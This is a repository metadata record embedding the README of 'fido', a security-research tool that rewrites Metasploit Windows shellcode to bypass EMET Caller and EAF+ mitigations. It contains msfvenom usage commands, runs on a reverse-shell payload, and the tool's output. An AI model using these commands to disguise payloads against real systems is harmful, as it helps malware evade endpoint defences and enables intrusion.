{"id":13464679,"url":"https://github.com/secretsquirrel/fido","last_synced_at":"2025-08-21T02:32:00.920Z","repository":{"id":70395861,"uuid":"63283120","full_name":"secretsquirrel/fido","owner":"secretsquirrel","description":"Teaching old shellcode new tricks","archived":false,"fork":false,"pushed_at":"2017-08-01T12:40:41.000Z","size":18762,"stargazers_count":203,"open_issues_count":0,"forks_count":60,"subscribers_count":21,"default_branch":"master","last_synced_at":"2024-12-10T05:42:56.301Z","etag":null,"topics":["assembly","emet","iat-parsing","metasploit","msfvenom","shellcode"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/secretsquirrel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2016-07-13T22:14:13.000Z","updated_at":"2024-08-12T19:23:49.000Z","dependencies_parsed_at":"2023-04-24T19:47:06.252Z","dependency_job_id":null,"html_url":"https://github.com/secretsquirrel/fido","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/secretsquirrel%2Ffido","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/secretsquirrel%2Ffido/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/secretsquirrel%2Ffido/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/secretsquirrel%2Ffido/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/secretsquirrel","download_url":"https://codeload.github.com/secretsquirrel/fido/tar.gz/refs/heads/master"
,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":230479864,"owners_count":18232630,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["assembly","emet","iat-parsing","metasploit","msfvenom","shellcode"],"created_at":"2024-07-31T14:00:48.534Z","updated_at":"2024-12-19T18:18:03.425Z","avatar_url":"https://github.com/secretsquirrel.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# fido\nTeaching an old shellcode new tricks\n\nGive fido.py an x86 (32 bit or 64 bit) Windows shellcode and it will strip off Stephen Fewer's hash API stub and replace it \nwith something that bypasses EMET Caller and EAF+ checks but keeps the actual API calls in use.\n\n# WARNING: If the 2nd stage payload uses the hash API from metasploit that loads Win APIs from the Export Address Table and jmp's into them, EMET will catch it.\n\nIf the warning didn't make sense, you might want to walk away or read up: \n\n* REcon BR Slides: https://github.com/secretsquirrel/fido/blob/master/REconBR_2017.pdf\n* Defcon 25 Slides: https://github.com/secretsquirrel/fido/blob/master/Defcon_25_2017.pdf\n* Demo1 (Hash Mangling POC): https://youtu.be/p3vFRx5dur0\n* Demo2 (Tor Exploit POC): https://youtu.be/oqHT6Ienudg\n\n## Usage\n\nCan take input from stdin and write output to stdout:\n```\nmsfvenom -p windows/exec CMD=calc EXITFUNC=thread | ~/github/fido/testharness.py -m -b Tcpview.exe -p ExternGPA -t win10  \u003e test.bin\n```\n\nCan take input from the command line (via -s).\n\nWant win7-win10 compatibility?  
Use the following command:\n\n```\nmsfvenom -p windows/exec CMD=calc EXITFUNC=thread | ~/github/fido/fido.py -p ExternGPA -l api-ms-win-core-libraryloader-l1-1-0.dll -d kernel32.dll \u003e test.bin\n```\n\nThis will use GetProcAddress in api-ms-win-core-libraryloader-l1-1-0.dll import from the kernel32.dll loaded module. \n\n\nHelp output:\n\n```\n[!] -s is required either from cmd line flag or stdin \u003ccat code.bin\u003e | ./fido.py\nusage: use \"fido.py --help\" for more information\n\nThis code imports metasploit sourced x86 windows shellcode that employs\nStephen Fewers Hash API stub and replaces it to bypass EMET Caller/EAF checks\nand other bolt on mitigations. Accepts msfvenom output from stdin or from disk.\nDoesn't do logic checks on provided payload to ensure it is x86 (32bit) or for windows\nOS (up to you to be correct)\n\npositional arguments:\n  infile\n  outfile\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -b TARGETBINARY, --targetbinary TARGETBINARY\n                        Binary that shellcode will be customized to (Optional)\n  -t OS, --OSTarget OS  OS target for looking for target DLL Import Tables: winXP, win7, win8, winVista, win10\n  -s CODE, --shellcode CODE\n                        x86/x64 Windows Shellcode with Stephen Fewers Hash API prepended (from msfvenom) can be from stdin\n  -d DLL, --DLLName DLL\n                        If you know the DLL in the IAT you are targeting enter this, no need for OS flag.\n  -l IMPORTNAME, --Import IMPORTNAME\n                        For use with -d and ExternGPA (-p), specify either 'kernel32.dll' or\n                        'api-ms-win-core-libraryloader' -- you need to know with import you are targeting.\n                        To know, run without -d for a list of candidates. 
Default is kernel32.dll but not always right!\n\n  -m, --mangle          Mangle metasploit hash apis from their original values (you want to do this)\n  -o OUTPUT, --output OUTPUT\n                        How you would like your output: [c], [p]ython, c[s]harp Default: stdout.\n  -p PARSER_STUB, --parser_stub PARSER_STUB\n                        By default this assumes that GetProcAddress (GPA) is in the targetbinary's\n                        Import Address Table (IAT) if no targetbinary or DLL name is provided.\n                        Four options:\n                            GPA  - GPA is in targetbinary IAT (default)\n                            LLAGPA - LoadlibraryA(LLA)/GPA is in the targetbinary IAT (smallest shellcode option)\n                            ExternGPA -- need DLLName or targetbinary to use\n                            ExternLLAGPA -- need DLLName or targetbinary to use\n                            ExternGPAFC -- -d kernel32.dll -l kernelbase.dll  # only works on win8 - win10\n                            OffsetGPA -- -b target.EXE # static offset to that version of software (target EXE)\n                            ExternOffsetGPA -- -b target.DLL -d import_dll # static\n  -n, --donotfail       Default: Fail if Stephen Fewers Hash API stub is not there, use -n to bypass\n  -M MODE, --mode MODE ASM mode 32 or 64, usually automatic\n```\n\n## Other Examples:\n\n ### ExternGPAFC\nWorks on Win8-Win10 only.\n```\n cat ~/github/metasploit-framework/reverse_shell_x64_8080_172.16.186.1.bin |  ./fido.py -b ~/github/the-backdoor-factory/whois64.exe -m -p ExternGPAFC -t win10 \u003e test.bin\n[*] Length of submitted payload: 0x1cc\n[*] Stripping Stripping Fewers 64bit hash stub \n[*] Length of code after stripping: 258\n[*] Disassembling payload\n[*] Mangling kernel32.dll!LoadLibraryA call hash: 0x5df8d241\n[*] Mangling ws2_32.dll!WSAStartup call hash: 0xe6fe222e\n[*] Mangling ws2_32.dll!WSASocketA call hash: 0x16f19f04\n[*] Mangling ws2_32.dll!connect 
call hash: 0x76223a2d\n[*] Mangling kernel32.dll!CreateProcessA call hash: 0x6d6e1502\n[*] Mangling kernel32.dll!WaitForSingleObject call hash: 0x44e7a13f\n[*] Mangling kernel32.dll!ExitThread call hash: 0x5a4eb474\n[*] Mangling kernel32.dll!GetVersion call hash: 0xf1669f77\n[*] Mangling ntdll.dll!RtlExitUserThread call hash: 0x66b4939a\n[*] Called APIs: ['kernel32.dll!LoadLibraryA', 'ws2_32.dll!WSAStartup', 'ws2_32.dll!WSASocketA', 'ws2_32.dll!connect', 'kernel32.dll!CreateProcessA', 'kernel32.dll!WaitForSingleObject', 'kernel32.dll!ExitThread', 'kernel32.dll!GetVersion', 'ntdll.dll!RtlExitUserThread']\n[*] String Table: b'ExitThread\\x00WSASocketA\\x00CreateProcessA\\x00kernel32\\x00LoadLibraryA\\x00RtlExitUserThread\\x00ws2_32\\x00connect\\x00GetVersion\\x00WaitForSingleObject\\x00ntdll\\x00WSAStartup\\x00'\n[*] Building lookup table\n[*] Using ExternGPAFC from  hash: 0x0, import name: kernelbase.dll\n[*] Assembling lookup table stub\n[*] Payload complete\n[*] Output size: 964\n\n```\n\n\n ### ExternOffset\nUses the exact location of GetProcAddress Offset for a particular dll and import dll. 
In this case, kernel32_10.0.16237_32bit.dll is the target version binary, and GPA exists in kernel32.dll via (minwin).\n\n```\ncat ~/github/metasploit-framework/reverse_shell_x64_8080_172.16.186.1.bin |  ./fido.py -b kernel32_10.0.16237_32bit.dll -d kernel32.dll -m -p ExternOffsetGPA -t win10 \u003e test.bin                          \n[*] Length of submitted payload: 0x1cc\n[*] Stripping Stripping Fewers 64bit hash stub \n[*] Length of code after stripping: 258\n[*] Disassembling payload\n[*] Mangling kernel32.dll!LoadLibraryA call hash: 0x89d3d69b\n[*] Mangling ws2_32.dll!WSAStartup call hash: 0x23b6665d\n[*] Mangling ws2_32.dll!WSASocketA call hash: 0x7c77f885\n[*] Mangling ws2_32.dll!connect call hash: 0x78e785f1\n[*] Mangling kernel32.dll!CreateProcessA call hash: 0x53e02b59\n[*] Mangling kernel32.dll!WaitForSingleObject call hash: 0xcb5b4068\n[*] Mangling kernel32.dll!ExitThread call hash: 0xcd188037\n[*] Mangling kernel32.dll!GetVersion call hash: 0x6a298791\n[*] Mangling ntdll.dll!RtlExitUserThread call hash: 0x1b59416e\n[*] Called APIs: ['kernel32.dll!LoadLibraryA', 'ws2_32.dll!WSAStartup', 'ws2_32.dll!WSASocketA', 'ws2_32.dll!connect', 'kernel32.dll!CreateProcessA', 'kernel32.dll!WaitForSingleObject', 'kernel32.dll!ExitThread', 'kernel32.dll!GetVersion', 'ntdll.dll!RtlExitUserThread']\n[*] String Table: b'RtlExitUserThread\\x00WSAStartup\\x00CreateProcessA\\x00WaitForSingleObject\\x00WSASocketA\\x00LoadLibraryA\\x00ws2_32\\x00GetVersion\\x00ExitThread\\x00ntdll\\x00connect\\x00kernel32\\x00'\n[*] Building lookup table\n[*] Loading PE in pefile\n[*] Parsing data directories\n[*] Found API: loadlibrarya\n[*] Found API: getprocaddress\n[*] Both LLA/GPA APIs found!\n[*] Using ExternOffsetGPA from kernel32.dll hash: 0x6a4abc5b, import name: main_module\n[*] Parsing data directories...\n[*] GPA offset: 0x710a8\n[*] Assembling lookup table stub\n[*] Payload complete\n[*] Output size: 
830\n```\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsecretsquirrel%2Ffido","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsecretsquirrel%2Ffido","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsecretsquirrel%2Ffido/lists"}